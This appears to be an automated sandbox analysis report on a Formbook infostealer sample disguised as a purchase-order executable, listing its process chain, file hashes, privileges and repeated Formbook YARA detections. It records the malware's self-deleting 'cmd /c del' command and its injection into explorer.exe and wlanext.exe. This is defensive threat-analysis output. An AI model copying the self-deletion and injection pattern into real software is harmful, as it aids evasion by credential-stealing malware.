                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:00:22:04
                                            Start date:28/10/2021
                                            Path:C:\Users\user\Desktop\PO_101&102.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0x640000
                                            File size:680960 bytes
                                            MD5 hash:D814902BA2D06C94C66F52CE53ED1428
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:00:22:07
                                            Start date:28/10/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff720ea0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:00:22:28
                                            Start date:28/10/2021
                                            Path:C:\Windows\SysWOW64\wlanext.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\wlanext.exe
                                            Imagebase:0x920000
                                            File size:78848 bytes
                                            MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:00:22:33
                                            Start date:28/10/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\PO_101&102.exe'
                                            Imagebase:0xd80000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:00:22:34
                                            Start date:28/10/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7f20f0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >